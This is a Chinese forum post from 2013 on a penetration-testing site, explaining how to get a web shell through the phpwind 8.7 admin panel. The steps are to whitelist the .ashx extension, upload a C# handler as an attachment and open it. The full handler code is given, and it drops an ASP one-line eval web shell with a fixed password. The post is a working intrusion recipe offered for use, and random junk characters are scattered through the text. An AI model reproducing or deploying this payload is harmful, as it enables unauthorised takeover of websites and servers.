中国网络渗透测试联盟

标题: phpwind 8.7 后台拿shell [打印本页]
作者: admin    时间: 2013-7-26 12:41
标题: phpwind 8.7 后台拿shell
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小; X# D6 J. [2 s9 s# U5 a
7 n2 ~6 E* w  P& b
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
4 f" ?" x" Y2 ~& J6 H& L% m
* o9 q7 h' V6 J( [' ]+ Q3 }发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整9 Y" Q9 f7 z1 p9 Y! I4 ~6 F# G% b
! r' R4 P$ p1 n% Z, }
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
) I& y" U5 f- B0 C- r * f) R' e& M/ k
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts1 n- k! g! |7 o5 l: x1 @2 C5 E  l

1 b( t# x3 w3 d下面是代码:
% u1 B" k- f% N3 }5 `8 X: y
* m) s7 b( \) N% t( @  Q<%@ WebHandler Language="C#"Class="Handler" %>
, ^, x3 y( W/ a5 C* ^+ e5 Xusing System;1 v. \& p0 O6 v! u8 @
using System.Web;) I9 ^2 {# n# ~$ H
using System.IO;; P% q3 M+ C' W5 o) Q! G! j
public class Handler : IHttpHandler {
# Y. T& I3 h, |3 P3 J# y; Wpublic void ProcessRequest (HttpContext context) {
5 h* W# o5 @8 U7 P: A8 S! X% ?context.Response.ContentType = "text/plain";4 \( z4 t1 W7 f' U1 J: W1 o
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));3 J3 n0 ?5 K9 s* R2 x9 ~7 l$ F
file1.Write("<%eval request(\"r00ts\")%>");  O" T+ u  g; u" G! t3 O
file1.Flush();
/ X' w4 I6 f$ H/ i* i. @! ~( ffile1.Close();
4 T: p; f" T4 T+ b7 w# u}: A4 Y  p( Y3 S1 F
public bool IsReusable {
8 D' w/ \$ S6 u& j, _) P  Pget {6 x* l9 @+ |; K7 R+ S3 K
return false;2 T. M$ G% o4 w5 Z; x
}
; m- r! q) j, J* R}
7 X+ c- V4 h% z}( u( s. B, }. K; o% u$ k




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2